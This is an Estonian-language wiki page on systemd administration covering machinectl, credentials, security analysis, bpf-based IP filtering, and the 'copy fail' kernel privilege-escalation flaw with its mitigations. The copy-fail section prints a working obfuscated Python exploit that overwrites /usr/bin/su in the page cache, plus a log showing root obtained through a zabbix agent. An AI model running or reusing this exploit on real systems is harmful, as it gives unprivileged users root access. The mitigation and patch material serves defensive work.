root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
✗ PrivateMounts= Service may install system mounts 0.2
✗ SystemCallArchitectures= Service may execute system calls with all ABIs 0.2
✗ CapabilityBoundingSet=~CAP_BLOCK_SUSPEND Service may establish wake locks 0.1
✗ MemoryDenyWriteExecute= Service may create writable executable memory mappings 0.1
✗ RestrictNamespaces=~user Service may create user namespaces 0.3
✗ RestrictNamespaces=~pid Service may create process namespaces 0.1
✗ RestrictNamespaces=~net Service may create network namespaces 0.1
✗ RestrictNamespaces=~uts Service may create hostname namespaces 0.1
✗ RestrictNamespaces=~mnt Service may create file system namespaces 0.1
✗ CapabilityBoundingSet=~CAP_LEASE Service may create file leases 0.1
✗ CapabilityBoundingSet=~CAP_MKNOD Service may create device nodes 0.1
✗ RestrictNamespaces=~cgroup Service may create cgroup namespaces 0.1
✗ RestrictSUIDSGID= Service may create SUID/SGID files 0.2
✗ RestrictNamespaces=~ipc Service may create IPC namespaces 0.1
✗ ProtectHostname= Service may change system host/domainname 0.1
✗ CapabilityBoundingSet=~CAP_(CHOWN|FSETID|SETFCAP) Service may change file ownership/access mode/capabilities unrestricted 0.2
✗ CapabilityBoundingSet=~CAP_SET(UID|GID|PCAP) Service may change UID/GID identities/capabilities 0.3
✗ LockPersonality= Service may change ABI personality 0.1
✗ ProtectKernelTunables= Service may alter kernel tunables 0.2
✗ RestrictAddressFamilies=~AF_PACKET Service may allocate packet sockets 0.2
✗ RestrictAddressFamilies=~AF_NETLINK Service may allocate netlink sockets 0.1
✗ RestrictAddressFamilies=~AF_UNIX Service may allocate local sockets 0.1
✗ RestrictAddressFamilies=~… Service may allocate exotic sockets 0.3
✗ RestrictAddressFamilies=~AF_(INET|INET6) Service may allocate Internet sockets 0.3
✗ CapabilityBoundingSet=~CAP_MAC_* Service may adjust SMACK MAC 0.1
✗ RestrictRealtime= Service may acquire realtime scheduling 0.1
✗ Delegate= Service maintains its own delegated control group subtree 0.1
✗ CapabilityBoundingSet=~CAP_SYS_RAWIO Service has raw I/O access 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PTRACE Service has ptrace() debugging abilities 0.3
✗ CapabilityBoundingSet=~CAP_SYS_(NICE|RESOURCE) Service has privileges to change resource use parameters 0.1
✗ DeviceAllow= Service has no device ACL 0.2
✗ CapabilityBoundingSet=~CAP_NET_ADMIN Service has network configuration privileges 0.2
✗ ProtectProc= Service has full access to process tree (/proc hidepid=) 0.2
✗ ProcSubset= Service has full access to non-process /proc files (/proc subset=) 0.1
✗ CapabilityBoundingSet=~CAP_NET_(BIND_SERVICE|BROADCAST|RAW) Service has elevated networking privileges 0.1
✗ CapabilityBoundingSet=~CAP_AUDIT_* Service has audit subsystem access 0.1
✗ CapabilityBoundingSet=~CAP_SYS_ADMIN Service has administrator privileges 0.3
✗ PrivateNetwork= Service has access to the host's network 0.5
✗ PrivateUsers= Service has access to other users 0.2
✗ CapabilityBoundingSet=~CAP_SYSLOG Service has access to kernel logging 0.1
✗ SystemCallFilter=~@clock Service does not filter system calls 0.2
✗ SystemCallFilter=~@cpu-emulation Service does not filter system calls 0.1
✗ SystemCallFilter=~@debug Service does not filter system calls 0.2
✗ SystemCallFilter=~@module Service does not filter system calls 0.2
✗ SystemCallFilter=~@mount Service does not filter system calls 0.2
✗ SystemCallFilter=~@obsolete Service does not filter system calls 0.1
✗ SystemCallFilter=~@privileged Service does not filter system calls 0.2
✗ SystemCallFilter=~@raw-io Service does not filter system calls 0.2
✗ SystemCallFilter=~@reboot Service does not filter system calls 0.2
✗ SystemCallFilter=~@resources Service does not filter system calls 0.2
✗ SystemCallFilter=~@swap Service does not filter system calls 0.2
✗ IPAddressDeny= Service does not define an IP address allow list 0.2
✗ NotifyAccess= Service child processes may alter service state 0.2
✗ UMask= Files created by service are world-readable by default 0.1

→ Overall exposure level for nginx-07.service: 9.9 UNSAFE 😨
kasutaja@ph-minio-01:~$
</pre>

===bpf integratsioon===

Väited

* nö uuemal ajal on systemd ja bpf integreeritud, nt võrgu paketifiltri osas
* bpf integratsioon on seotud cgroup nähtusega, st kitsenduste tegemisel saab kaustada info võrguaadresside, systemd objektide (slice, service) jms kohta (selles mõttes paindlikum kui niisama iptables/nft kuigi ka seal on iseenesest kasutajaga seostamine olemas)
* bpf ei ole stateful tulemüür, st bpf on stateless (conntrack jms puudub)
* bpf palju suurema jõudlusega kui tava-paketifilter

====Service====

Tavalisse service unitisse lisada Service sektsiooni 'IPAddressAllow' ja 'IPAddressDeny' direktiive, nt (see on küll podmaniga seotud service generated variant)

<pre>
root@ph-minio-01:~# cat .config/containers/systemd/nginx-06.container
[Unit]
Description=My Nginx Quadlet Service - 06
DefaultDependencies=no
After=network.target

[Container]
Image=docker.io/library/nginx:alpine
PublishPort=8096:80
ContainerName=nginx-06

[Service]
# Block all IP traffic by default
IPAddressDeny=any
# Then explicitly allow only what you need (e.g., your local subnet)
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.1
IPAddressAllow=8.8.8.8

[Install]
# This tells systemd to start it when you log in
WantedBy=default.target
</pre>

kus

* ipaddressallow ja deny väärtusi võrreldakse ip pakettide src ja destination aadressidega st piisab kui üks neist klapib

Kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl --user daemon-reload
root@ph-minio-01:~# systemctl --user stop nginx-06
root@ph-minio-01:~# systemctl --user start nginx-06
</pre>

Tulemuse uurimine, väätus id 185 on dünaamiline, õige saab ära vaadata 'bpftool prog show' väljundist

<pre>
root@ph-minio-01:~# bpftool prog show id 185
185: cgroup_skb name sd_fw_egress tag df35b3b526089f21 gpl run_time_ns 1378480 run_cnt 1215
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51

root@ph-minio-01:~# bpftool prog show id 186
186: cgroup_skb name sd_fw_ingress tag 208d1bf35e7113d2 gpl run_time_ns 516780 run_cnt 1204
loaded_at 2026-04-20T12:44:13+0300 uid 0
xlated 184B jited 140B memlock 4096B map_ids 51
</pre>

kus

* run_cnt näitab kui mitmel korral on kitsendust rakendatud

ning

<pre>
root@ph-minio-01:~# bpftool map show id 51
51: lpm_trie name 4_nginx_06.serv flags 0x1
key 8B value 8B max_entries 3 memlock 156B
</pre>

ning

<pre>
root@ph-minio-01:~# bpftool map dump id 51
key: 20 00 00 00 08 08 08 08 value: 01 00 00 00 00 00 00 00
key: 20 00 00 00 7f 00 00 01 value: 01 00 00 00 00 00 00 00
key: 18 00 00 00 c0 a8 0a 00 value: 01 00 00 00 00 00 00 00
Found 3 elements
</pre>

sellise skriptiga saab teisendada loetavamaks

<pre>
root@ph-minio-01:~# cat bpftool-map-dump.sh
#!/bin/bash

bpftool map dump id 51 | grep '^key' | while read -r line; do
bytes=($(echo $line | cut -d: -f2))
printf "Prefix: %d | IP: %d.%d.%d.%d\n" "$((16#${bytes[0]}))" "$((16#${bytes[4]}))" "$((16#${bytes[5]}))" "$((16#${bytes[6]}))" "$((16#${bytes[7]}))"
done

root@ph-minio-01:~# ./bpftool-map-dump.sh
Prefix: 32 | IP: 8.8.8.8
Prefix: 32 | IP: 127.0.0.1
Prefix: 24 | IP: 192.168.10.0
</pre>

Tulemusena ei saa konkteinerist välja võrku mujale pöörduda.

====Slice====

<pre>
root@ph-minio-01:~# systemctl edit user.slice

root@ph-minio-01:~# cat /etc/systemd/system/user.slice.d/override.conf
[Slice]
# This is a slice, but we can still pass BPF instructions
IPAddressDeny=any
IPAddressAllow=192.168.10.0/24
IPAddressAllow=127.0.0.0/8
</pre>

kehtestada muudatus

<pre>
root@ph-minio-01:~# systemctl daemon-reload
</pre>

logida välja ja sisse ssh pealt näiteks ning

<pre>
root@ph-minio-01:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
^C
--- 8.8.8.8 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1005ms

root@ph-minio-01:~#
</pre>

====Misc====

bpftop esitab ülevaatlikult

[[Fail:20260420-systemd-bpf-01.png|800px]]

===20260501 - copy fail eksploit===

Väited

* küllap kõik see lugu on ajutise iseloomuga praktiliselt, st varsti saabub uus parandatud linux kernel
* pedagoogilises mõttes on see huvitav lugu
* vahetulemusi on huvitav pasteda chatgpt'le ja küsida selgitusi

====Tööpõhimõte - af_alg====

af_alg on omaette 'address family' nagu af_unix (nn unix soket), af_inet (tavaline internet), af_netlink, af_xdp jt. Tema kaudu saab eksootilisem tarkvara kasutada riistvara lähedast krüptimist, nt (kcapi - kernel crypto api)

<pre>
root@pwrk-02:/home/imre/20260430# apt-get install kcapi-tools

imre@pwrk-02:/home/imre/20260430$ date > cleartext.txt

imre@pwrk-02:/home/imre/20260430$ kcapi-enc -e -c "cbc(aes)" --passwd "MyPassword123" --iv $(openssl rand -hex 12) < cleartext.txt > encrypted.bin
kcapi-enc - Warning: Password on command line is visible in process listing and /proc! Use --passwd_fd command line option!
kcapi-enc - Warning: PBKDF2 iterations used: 131072
kcapi-enc - Warning: PBKDF2 salt used: 245b53106bb1d0cf09700fd63161dd0b59601995e368d6410d6e59adbd7e8468
</pre>

kus

* valitud krüpto 'cbc(aes)' asemel saab olla ka muud, nad kõik toimetavad af_alg soketi kaudu, aga edasi kasutavad erinevaid oskusi, nendega on seotud erinevad täiendavad kerneli moodulid - eksploitimisega on seotud konkreetselt üks - algif_aead

<pre>
imre@pwrk-02:~$ lsmod | grep alg
algif_hash 12288 0
algif_rng 12288 0
algif_skcipher 12288 0
algif_aead 12288 0
af_alg 32768 4 algif_hash,algif_skcipher,algif_aead,algif_rng
</pre>

Nn af_alg funktsionaalsuse kasutamine toimub user-space pealt ja teenindamine toimub kernel-space peal, ja nagu tavaliselt seda nö horisonti ületatakse syscall tehnika abil. syscall'il on tohtu vastutus oma sisendi kontrollimise ja oma tegevuste osas - privilegeerimata actor palub midagi korda saata väga privilegeeritud actoril; mingis mõttes on ta nagu setuid bit või sudo-abil-root-minemine.

====Tööpõhimõte - eksploit====

copy fail eksploit kasutab ära af_alg osakonnas kerneli ümbruses toimuvaid võimalusi, privilegeerimata kaustajal on võimalik kirjutada page cache sisu mingis ulatuses üle. Nt selliselt

* esmalt korraldatakse page cache peale mõni setuid bit sisselülitusega fail, nt 'su' - nt lugedes faili tavalisel viisil satub tema sisu page cache'i
* siis muudetakse sisu sobivalt page cache osakonnas (st arvuti mälus) - see on võimalik tänu eksploidi toimimisele - üldiselt on linux kerneli lubadus selline, et kui protsess (privilegeerimata protsess antud juhul) ei saa failisüsteemis faili muuta, siis ei saa ta tegeleda ka cache'itud vastava faili sisuga)
* käivitatakse muudetud failile vastav programm, kuna fail on juba page cache peal, siis failisüsteemist seda uuesti ei loeta - setuid bit kätega minnakse root shelli
* teoreetiliselt võiks olla võimalik kas vastupidine, st mõnele pahale programmile vastavale failile pannakse külge setuid bit, aga antud juhul ei ole see kõneks - seda oleks ehk raskem teha st sobiv koht cache pealt üles otsida, ja see setuid bit on faili metaandmete koosseisu st asub inode cache peal mitte page cache, ja kõneksolev eksploit sinna ei saa sodima minna
* page cache on üldiselt seotud vfs (virtual filesystem) nähtusega, st sellega, mis on nö ext4 jt failisüsteemide kohal ja protsesside all

Asjaosalised kihid

<pre>
arvutis töötavad protsessid (asuvad arvuti mälus)

|
v

vfs (virtual file system) (asub arvuti mälus)

|
v

page cache (asub arvuti mälus)

|
v

ext4 filesystem (asub plokkseadmel)

|
v

plokkseade (asub nö füüsilisel esemel)
</pre>

kus

* page cache peale tehtud muudatuse saab unustada öeldes '# echo 3 > /proc/sys/vm/drop_caches'
* page cache peale tehtud muudatuse saab põlistada ext4 failisüsteemi öeldes 'sync'
* plokkseadme puhvrid saab madalamale kihile kirjutada põlistada blockdev käsu abil

Üldiselt on syscallidel tohutu vastutus oma sisendit valideerida ja jälgida mida nad edasi teevad, tundub, et antud juhul af_alg teemaga tegelevad syscall'id seda vastutust ei kanna välja st lasevad ennast manipuleerida.

====Tööpõhimõte - leevendus====

Kõige õigem oleks kernel tarkvara parandus ja küllap see varem või hiljem saabub. Seniks on võimalik rakendada ühte- ja teistsugust leevendust (mitigation)

* uskuda, et pahatahtlik kasutaja süsteemis ei tegutse programme kohale tuues ja neid kävitades (nö tavaline veebiserver pigem ei tohiks lubada ette anda koodi mida käivitatakse; tavaline veebiserver käivitab süsteemi haldajate poolt paigaldatud koodi)
* lülitada kerneli tasemal välja af_alg funktsionaalsus (modprobe) - mõju globaalne
* lülitada syscall tulemüüri tasemel välja af_alg funktsionaalsus (nn secure computing ehk seccomp, mis omakorda põhineb bpf tehnikal, vist nn 'Seccomp-BPF', mida ei haldab bpftool (bpftool tegeleb eBPF osakonnaga nähtustega) - mõju protsessile (ja tema järglastele, või systemd service unitiga seotud protsessidele)

Kerneli tasemel välja lülitamine eeldab praktiliselt, et af_alg funktsionaalsus on realiseeritud tuuma moodulite abil (ei ole otse nn /boot/vmlinuz kerneli sisse kompileeritud). Tavaliselt on modulaarne. Mõju on globaalne.

syscall tulemüüri tasemel välja lülitamine on paindlik - saab (peab st muul viisil ei saagi praktiliselt st globaalselt ei saa (kuigi teoreetiliselt saaks init=pid=1 protsessile ka seccomp abil kitsendusi rakendada, aga tavaliselt nii ei tehta) erinevate protsesside (protsesside komplektide) jaoks muudatust kehtestada. Seejuures saab määrata, mis keeldu ületada püüdva protsessiga edasi juhtub: 1. ta töötab edasi, 2. ta töötamine lõpetatakse

Leevenduste iseloomustus

* systemd (seccomp) - operatsioonisüsteemi syscall liidesel asuv nö tulemüür, mingis mõttes asub kerneli protsesside poole vaatavas osas
* apparmor (lsm - linux security modules)- erinevate süsteemi võimekustele ligipääsemise takistamised (asub kerneli protsesside poole vaatavast osast teisel pool)
* modprobe - kerneli funktsionaalsust realiseeriv komponent (kahe esimese puhul ei saa funktsionaalust kasutada isegi kui kernelis on see iseenest kohal)

====Eksploit näide====

https://copy.fail/ - tõenäoliselt on see nö puhas eksploit, st midagi suurelt temaga katsetamine ussitama ei aja st vaevalt ta interneti isandale sama arvuti /root/.ssh sisu saadab, aga kuna ta page cache sobib ja vaevalt, et seda exploiti on liiga palju testitud ja arendatud, siis ei ole võimatu ext4 failisüsteemi riknemine, arvutis töötavate protsesside segadusse sattumine kuni os krahhini; st proovida ehk maksab, aga arvutis, mis pärast kustutatakse

<pre>
$ cat /home/tmp/cf.py
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

$ chmod 0755 /home/tmp/cf.py
</pre>

zabbix agent kaudu

<pre>
root@pwrk-02:~# cat /etc/zabbix/zabbix_agent2.d/misc.conf
UserParameter=cf,echo id | /home/tmp/cf.py 1>>/home/tmp/cf.log 2>&1
</pre>

käivitamine

<pre>
root@pwrk-02:~# zabbix_get -k cf -s 127.0.0.1

root@pwrk-02:~#
</pre>

logi

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
..
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
uid=0(root) gid=109(zabbix) groups=109(zabbix)
...
</pre>

page cache puhastamine ("3" kasutamine nö puhastab kõik, inode cache, page cache jne, põhimõtteliselt sobiks ka "1")

<pre>
root@pwrk-02:~# echo 3 > /proc/sys/vm/drop_caches
</pre>

katsetamisel võib olla vajalik vahel jällegi moodulid välja lülitada, nt

<pre>
root@pwrk-02:~# rmmod algif_rng algif_aead algif_skcipher algif_hash af_alg
</pre>

====Leevendus - systemd service====

Väited

* mõju on service põhine
* praktiliselt võiks rakendada avalikku võrku publitseeritud teenuste (protsesside) jaoks mille kaudu võiks olla selline python skript laadse sisu käivitamine (mingit tüüpi exec syscall rakendamine) realistlik
* öeldakse, et kasutame systemd võimalusi, tehniliselt kasutatakse linux kerneli secure compute võimalusi (seccomp)
* kehtestamiseks tuleb systemd service stop ja start öelda

systemd service unit muudatus, enne (zabbix-agent protsessi pid on 174841)

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~

root@pwrk-02:/home/imre/20260430# cat /proc/174841/status | grep -i secco
Seccomp: 0
Seccomp_filters: 0
</pre>

muudatus

<pre>
# root@pwrk-02:~# systemctl edit zabbix-agent2
[Service]
RestrictAddressFamilies=~AF_ALG
# SystemCallErrorNumber=kill
# SystemCallErrorNumber=EPERM
</pre>

kus

* RestrictAddressFamilies=~AF_ALG konstruktsioon väljendab eitust st kõik protokollid on lubatud v.a. AF_ALG
* SystemCallErrorNumber kontrollib, mis rikkumist proovinud protsessiga edasi saab

peale muudatust

<pre>
root@pwrk-02:~# systemctl show zabbix-agent2 -p RestrictAddressFamilies
RestrictAddressFamilies=~AF_ALG

root@pwrk-02:/home/imre/20260430# cat /proc/174842/status | grep -i secco
Seccomp: 2
Seccomp_filters: 2
</pre>

Eksploit kasutamine annab nüüd sellise tulemuse

<pre>
root@pwrk-02:~# tail -f /home/tmp/cf.log
...
Traceback (most recent call last):
File "/home/tmp/cf.py", line 9, in <module>
while i<len(e):c(f,i,e[i:i+4]);i+=4
^^^^^^^^^^^^^^^
File "/home/tmp/cf.py", line 5, in c
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3.12/socket.py", line 233, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
</pre>

====Leevendus - apparmor profile====

TODO

====Leevendus - modprobe====

Väited

* mõju on globaalne süsteemile - võib olla on see liiga suure mõjuga st arvuti juures midagi siiski vajab af_alg

<pre>
# cat /etc/modprobe.d/mitigate-copy-fail.conf
install algif_aead /bin/true
</pre>

kus

* 'install algif_aead' element ütleb, et kui toimub algif_aead mooduli laadimise attampt, siis hoopis täita järgnev käsk - '/bin/true' (mingi teooria kohaselt on /bin/true kasutamine sobivam kui /bin/false kuna vea saamisel võiks süsteem proovida veelkorra moodulit laadida jne)
* selle käsu andmisel tehniliselt ollakse õnnelik iseensest kuigi sisuliselt midagi ei muutu
* muudatus kehtestub koheselt

ning parem oleks ehk ka initramfs uuesti tekitada

<pre>
root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep alg
usr/lib/modules/6.8.0-110-generic/kernel/crypto/af_alg.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_aead.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_hash.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_rng.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/crypto/algif_skcipher.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos
usr/lib/modules/6.8.0-110-generic/kernel/drivers/i2c/algos/i2c-algo-bit.ko.zst
usr/lib/modules/6.8.0-110-generic/kernel/net/xfrm/xfrm_algo.ko.zst
</pre>

ja

<pre>
root@pwrk-02:~# update-initramfs -u
update-initramfs: Generating /boot/initrd.img-6.8.0-110-generic
I: The initramfs will attempt to resume from /dev/dm-2
I: (/dev/mapper/system-swap)
I: Set the RESUME variable to override this.

root@pwrk-02:~# lsinitramfs /boot/initrd.img | grep 'etc/modprobe.d'
etc/modprobe.d
etc/modprobe.d/amd64-microcode-blacklist.conf
etc/modprobe.d/blacklist-ath_pci.conf
etc/modprobe.d/blacklist-firewire.conf
etc/modprobe.d/blacklist-framebuffer.conf
etc/modprobe.d/blacklist-rare-network.conf
etc/modprobe.d/blacklist.conf
etc/modprobe.d/dkms.conf
etc/modprobe.d/intel-microcode-blacklist.conf
etc/modprobe.d/iwlwifi.conf
etc/modprobe.d/mdadm.conf
etc/modprobe.d/mitigate-copy-fail.conf
root@pwrk-02:~#
</pre>

====Misc - docker rootful====

docker rootful puhul tuleb muuta kahte service'it - kuna child protsessid pärivad vanematelt seccomp jms omadused, siis mõju on tõhus

* docker
* containerd

====Debian====

20260501 ilmus Debian operatsioonisüsteemile parandatud tuum

[[Fail:20260502-debian-copy-fail-01.png|1000px]]

kus

* https://www.debian.org/security/
* https://security-tracker.debian.org/tracker/source-package/linux
* muudatusi saab otsida globaalse CVE nime abil (nt CVE-2026-31431)

====Ubuntu====

20260501 ilmus Ubuntu operatsioonisüsteemile parandatud kmod pakett

[[Fail:20260502-ubuntu-copy-fail-01.png|1000px]]

kus

* kmod paketis sisaldub fail etc/modprobe.d/disable-algif_aead.conf

<pre>
root@pwrk-02:~/20260502# cat etc/modprobe.d/disable-algif_aead.conf
# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
# This will likely be re-enabled in a subsequent update once an updated
# kernel has been deployed.
# Blacklisting the module isn't sufficient, we need to do as below:
install algif_aead /bin/false
</pre>

* küllap parandatud tuum ilmub seejärel

====Proxmox====

20260501 on ilmunud no-subscription repodesse v. 7 tuum, seda see 'copy fail' haavatavus ei puuduta

<pre>
root@pve-svc-02:~# uname -a
Linux pve-svc-02 7.0.0-3-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.0-3 (2026-04-21T22:56Z) x86_64 GNU/Linux
</pre>

====Kasulikud lisamaterjalid====

* https://oneuptime.com/blog/post/2026-03-02-how-to-configure-systemd-service-hardening-on-ubuntu/view
* https://oneuptime.com/blog/post/2026-03-02-how-to-use-seccomp-to-restrict-system-calls-on-ubuntu/view

===Kasulikud lisamaterjalid===

* [[:Systemd-nspawn kasutamine operatsioonisüsteemiga Debian]]
* http://en.wikipedia.org/wiki/Systemd
* http://blog.exppad.com/article/a-docker-like-container-management-using-systemd
* http://0pointer.net/blog/projects/systemd-for-admins-1.html
* http://zero-knowledge.org/post/92
* http://0pointer.de/public/systemd-ebook-psankar.pdf
* http://ktaraghi.blogspot.com/2013/11/what-is-systemd-and-how-it-works-part-1.html

Systemd kasutamine

2026-05-02T10:11:52Z

Imre: /* Tööpõhimõte - leevendus */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

